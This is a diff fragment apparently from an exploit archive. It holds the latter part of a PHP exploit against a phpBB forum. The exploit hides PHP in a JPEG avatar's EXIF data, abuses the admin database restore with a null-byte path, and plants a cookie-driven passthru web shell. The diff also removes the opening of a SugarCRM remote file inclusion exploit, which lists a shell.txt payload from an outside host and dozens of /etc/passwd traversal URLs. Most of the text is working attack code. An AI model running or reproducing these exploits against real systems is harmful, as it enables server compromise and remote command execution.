+Content-Disposition: form-data; name="max_poll_options"
+
+50
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_html"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_html_tags"
+
+b,i,u,pre
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_bbcode"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_smilies"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="smilies_path"
+
+images/smiles
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_sig"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="max_sig_chars"
+
+255
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_namechange"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_avatar_local"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_avatar_remote"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_avatar_upload"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatar_filesize"
+
+6144
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatar_max_height"
+
+100
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatar_max_width"
+
+100
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatar_path"
+
+images/avatars
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatar_gallery_path"
+
+images/avatars/gallery
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="coppa_fax"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="coppa_mail"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="board_email"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="board_email_sig"
+
+Thanks, The Suntzu S.p.A.
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="smtp_delivery"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="smtp_host"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="smtp_username"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="smtp_password"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="submit"
+
+Submit
+----------------------------7d62702f250530--
+';
+
+$packet="POST ".$p."admin/admin_board.php?sid=".$session_id." HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."admin/admin_board.php?sid=".$session_id."\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (eregi("Forum Configuration Updated Successfully",$html))
+{
+echo "Done...\r\n";
+}
+else
+{echo("Unable to modify configuration...");}
+
+echo "step 3 -> upload an avatar with php code as EXIF metadata content...\r\n";
+$avatar=
+chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
+chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
+chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
+chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
+chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
+chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
+chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
+chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
+chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
+chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
+chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
+chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
+chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
+chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
+chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
+chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
+chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
+chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
+chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
+chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
+chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
+chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
+chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
+chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
+chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
+chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
+chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
+chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
+chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
+chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
+chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
+chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
+chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
+chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
+chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
+chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
+chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
+chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
+chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
+chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
+chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
+chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
+chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
+chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
+chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
+
+/*
+this image has this code inside as EXIF metadata content
+<?php
+$fp=fopen("suntzu.php","w");
+fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
+fclose($fp);
+chmod("suntzu.php",777);
+?>
+*/
+
+$data='-----------------------------7d62702f250530
+Content-Disposition: form-data; name="username"
+
+suntzu
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="email"
+
+suntzu@fakemail.com
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="cur_password"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="new_password"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="password_confirm"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="icq"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="aim"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="msn"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="yim"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="website"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="location"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="occupation"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="interests"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="signature"
+
+suntzu giving you the pain
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="viewemail"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="hideonline"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="notifyreply"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="notifypm"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="popup_pm"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="attachsig"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allowbbcode"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allowhtml"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allowsmilies"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="language"
+
+italian
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="style"
+
+1047
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="timezone"
+
+2
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="dateformat"
+
+D M d, Y g:i a
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+100000
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatar"; filename="whatever.jpeg";
+Content-Type: image/pjpeg
+
+'.$avatar.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatarurl"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatarremoteurl"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="mode"
+
+editprofile
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="agreed"
+
+true
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="coppa"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="user_id"
+
+999999
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="current_email"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="submit"
+
+Submit
+-----------------------------7d62702f250530--
+';
+
+$packet="POST ".$p."profile.php HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+sleep(1);
+
+echo "step 4 -> retrieve new filename for avatar from profile page...\r\n";
+$packet="GET ".$p."profile.php?mode=editprofile HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("images/avatars/",$html);
+$temp2=explode("\"",$temp[1]);
+$avatar_name=$temp2[0];
+echo "avatar filename -> ".$avatar_name."\r\n";
+if ($avatar_name=='') {die("Unable to retrieve filename...");}
+
+echo "step 5 -> replace default_lang value in phpbb_config table with our path to shell, breaking path with a null char...\r\n";
+$sql='
+#
+# our path to avatar, using a null char to break the path
+#
+
+UPDATE phpbb_config SET config_value=CONCAT("english/../../images/avatars/'.$avatar_name.'",CHAR(0)) where config_name="default_lang";
+
+';
+
+$data='-----------------------------7d62702f250530
+Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql";
+Content-Type: text/plain
+
+'.$sql.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="perform"
+
+restore
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="restore_start"
+
+Start Restore
+-----------------------------7d62702f250530--
+';
+$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (eregi("The Database has been successfully restored",$html))
+{
+echo "Done...\r\n";
+}
+else
+{
+die("Unable to modify table...");
+}
+
+echo "step 6 -> execute code inside jpeg file\r\n";
+$packet="GET ".$p."faq.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+sleep(1);
+
+echo "step 7 -> Launch commands...\r\n";
+$packet="GET ".$p."suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=dir;\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+  echo "Exploit succeeded...\r\n";
+  $temp=explode("56789",$html);
+  echo "\r\n".$temp[1]."\r\n";
+}
+else
+{
+  echo "Exploit failed...however you will be able to login as admin\r\n";
+  echo "with username \"suntzu\" and password \"suntzu\"\r\n";
+}
+
+
+echo "step 8 -> restore phpbb_config with the old value to keep the board accessible\r\n";
+$sql='
+#
+# old value for default_lang
+#
+
+UPDATE phpbb_config SET config_value="english" where config_name="default_lang";
+
+';
+
+$data='-----------------------------7d62702f250530
+Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql";
+Content-Type: text/plain
+
+'.$sql.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="perform"
+
+restore
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="restore_start"
+
+Start Restore
+-----------------------------7d62702f250530--
+';
+$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (eregi("The Database has been successfully restored",$html))
+{
+echo "Done...\r\n";
+}
+else
+{
+die("Unable to modify table...");
+}
+?>
+
+# milw0rm.com [2006-05-13]
diff --git a/platforms/php/webapps/1785.php b/platforms/php/webapps/1785.php
index 7e23bf377..098348ca1 100755
--- a/platforms/php/webapps/1785.php
+++ b/platforms/php/webapps/1785.php
@@ -1,226 +1,226 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "Sugar Suite Open Source <= 4.2 \"OptimisticLock!\" arbitrary remote inclusion exploit\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-echo "this is called the \"five claws of Sun-tzu\"\r\n\r\n";
-
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to sugar suite\r\n";
-echo "location:  an arbitrary location with the code to include\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /sugar/ http://somehost.com/shell.txt ls -la\r\n";
-echo "php ".$argv[0]." localhost /sugar/ http://somehost.com/shell.txt ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / http://somehost.com/shell.txt ls -la -P1.1.1.1:80\r\n\r\n";
-echo "note, you need this code in http://somehost.com/shell.txt\r\n";
-echo "<?php\r\n";
-echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n";
-echo "ini_set(\"max_execution_time\",0);\r\n";
-echo "echo \"*delim*\";\r\n";
-echo "passthru(\$_REQUEST[\"cmd\"]);\r\n";
-echo "echo \"*delim*\";\r\n";
-echo "?>\r\n";
-die;
-}
-
-/* software site: http://www.sugarcrm.com/crm/
-
-   i) vulnerable code in modules/OptimisticLock/LockResolve.php:
-
-   ...
-   if(empty($GLOBALS['sugarEntry'])) die('Not A Valid Entry Point'); //<--- the f@ke protection, nearly in all files
-   ...
-   if(isset($_SESSION['o_lock_object'])){
-	global $beanFiles, $moduleList;
-	$object = 	$_SESSION['o_lock_object'];
-	require_once($beanFiles[$beanList[$_SESSION['o_lock_module']]]);
-	$current_state = new $_SESSION['o_lock_class']();
-	$current_state->retrieve($object['id']);
-
-	if(isset($_REQUEST['save'])){
-		$_SESSION['o_lock_fs'] = true;
-		echo  $_SESSION['o_lock_save'];
-		die();
-	}else{
-		display_conflict_between_objects($object, $current_state->toArray(),$current_state->field_defs, $current_state->module_dir, $_SESSION['o_lock_class']);
-}}else{
-	echo 'No Locked Objects';
-}
-...
-
-you can include files from local & remote resources and launch commands, poc:
-
-with register_globals = On & allow_url_fopen = On:
-http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=http://somehost.com/someshell.txt
-with register_globals = On:
-http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=../../../../../../../../etc/passwd
-
-ii) arbitrary local inclusion issues in a lot of files:
-
-with register_globals = On & magic_quotes_gpc = Off:
-http://[target]/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1&module=1&record=1&beanList[1]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Calendar/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Calls/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/CampaignLog/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Campaigns/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Campaigns/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/CampaignTrackers/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Cases/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Contacts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Dashboard/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Documents/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Dropdown/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Dropdown/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/DynamicFields/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/EditCustomFields/EditView.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/EditCustomFields/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/EmailMan/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Emails/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/EmailTemplates/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Feeds/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Home/PopupSugar.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Leads/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/MailMerge/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Meetings/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Notes/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Opportunities/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Project/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Project/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/ProjectTask/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/ProspectLists/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Prospects/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Roles/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Tasks/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Users/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Users/Login.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-
-with register_globals=On:
-http://[target]/[path]/modules/Administration/RebuildAudit.php?GLOBALS[sugarEntry]=1&beanFiles[1]=../../../../../../../../../../../../../etc/passwd
-
-and (on PHP5) arbitrary remote inclusion, including a file from a ftp resource:
-
-http://[target]/[path]/modules/Administration/RebuildAudit.php?cmd=ls%20-la&GLOBALS[sugarEntry]=1&beanFiles[1]=ftp://username:password@somehost.com/shell.txt
-
-this is the exploit tool for i)
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
